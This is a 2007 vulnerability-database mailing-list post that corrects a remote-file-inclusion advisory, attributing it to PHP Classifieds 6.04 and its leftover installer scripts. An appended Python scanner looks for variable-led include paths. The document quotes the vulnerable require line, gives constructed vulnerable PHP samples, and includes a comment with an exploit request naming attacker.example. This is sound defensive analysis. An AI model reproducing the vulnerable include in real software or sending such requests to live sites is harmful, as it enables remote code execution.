[VIM] [false but true] "Allfaclassfieds" RFI no; PHP Classifieds yes
Steven M. Christey
coley at mitre.org
Wed Apr 25 16:13:44 UTC 2007
Researcher: Dr.RoVeR
Ref: Allfaclassfieds (level2.php dir) remote file inclusion
http://www.securityfocus.com/archive/1/archive/1/466648/100/0/threaded
With a name like "allfaclassfieds" that smelled like a typo, I
investigated a little bit more. The referenced download URL creates a
directory "phpclassifides". No mention of "allfa" is anywhere
according to grep.
Further grep finds this to be PHP Classifieds.
The presence of an "upgr_603_to_604.php" file, and most files dating
back to 2001, along with UPGRADE.txt, suggests an old version of 6.04;
latest version, released on April 14, is 7.2b.
The relevant RFI code does not appear in level2.php in the newer
version.
But in admin/setup/level2.php in 6.04, we have:
require("$dir/admin/db.php");
as the first executable PHP code.
The installation appears to move from level1.php through level5.php;
the latter deletes the install file. However, there's not any
evidence that the level*.php files are ever cleaned up, leaving them
open for later access.
- Steve
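Two checks a practitioner would want to run against an unpacked copy before trusting or dismissing an advisory like the one above, written as an added example that is not part of the VIM post or of PHP Classifieds: a grep-style scan for include/require sinks whose path begins with a PHP variable (the shape of the 6.04 level2.php line), and a scan of the file listing for installer scripts left behind after setup. The PHP snippets below are constructed to resemble the vulnerable line, not copied from the product; the assumption that an unset $dir becomes request-controlled via register_globals is the usual RFI mechanism for this pattern and is not something the post confirms.

```python
"""Checks for the two issues raised above: variable-led include sinks and
leftover installer scripts. Added example, not code from PHP Classifieds
or from the VIM post; sample inputs are constructed."""
import re
from typing import Iterable, List, NamedTuple

# An include/require(_once) whose argument starts with a PHP variable, either
# interpolated inside double quotes ("$dir/...") or concatenated ($dir . '...').
# A path anchored on a string literal or __DIR__ cannot be redirected to
# another host, so it is not flagged. Heuristic, line-based, no PHP parsing.
INCLUDE_RE = re.compile(
    r'\b(include|require)(_once)?\s*\(?\s*'
    r'(?:"\s*\$[A-Za-z_]\w*|\$[A-Za-z_]\w*\s*\.)'
)

# Installer stages that should be removed once installation has finished.
INSTALLER_RE = re.compile(r'(^|/)admin/setup/level\d+\.php$')


class Finding(NamedTuple):
    file: str
    line: int
    text: str


def find_variable_includes(source: str, name: str = "<inline>") -> List[Finding]:
    """Return one Finding per line where an include path begins with a variable."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if INCLUDE_RE.search(line):
            hits.append(Finding(name, lineno, line.strip()))
    return hits


def leftover_installer_files(paths: Iterable[str]) -> List[str]:
    """From a listing of a deployed tree, return installer scripts still present."""
    return sorted(p for p in paths if INSTALLER_RE.search(p))


# Constructed sample resembling admin/setup/level2.php in 6.04: $dir is never
# assigned before the require. Assumption: with register_globals=On a request
# such as ?dir=http://attacker.example/ then chooses the file to include.
VULNERABLE_SAMPLE = '''<?php
require("$dir/admin/db.php");
require_once($dir . "/admin/config.php");
?>'''

# Constructed hardened form: the base path is derived from the script's own
# location, so no request parameter can change where the include resolves.
HARDENED_SAMPLE = '''<?php
require(dirname(dirname(__DIR__)) . "/admin/db.php");
require_once(__DIR__ . "/../config.php");
?>'''

# Constructed file listing of an installed tree (the directory name is the
# one the download creates, as noted above).
SAMPLE_TREE = [
    "phpclassifides/index.php",
    "phpclassifides/admin/db.php",
    "phpclassifides/admin/setup/level2.php",
    "phpclassifides/admin/setup/level5.php",
    "phpclassifides/upgr_603_to_604.php",
]

if __name__ == "__main__":
    for f in find_variable_includes(VULNERABLE_SAMPLE, "level2.php"):
        print(f"{f.file}:{f.line}: variable-led include: {f.text}")
    print("hardened sample findings:", find_variable_includes(HARDENED_SAMPLE))
    print("installer files still present:", leftover_installer_files(SAMPLE_TREE))
```

The include scan is deliberately a line regex rather than a PHP parser, so it will miss a variable assigned to a safe value earlier in the same file; treat a hit as a line to read, not as a confirmed RFI. The installer check is the cheap way to test the cleanup question raised in the post against a real install rather than the source archive.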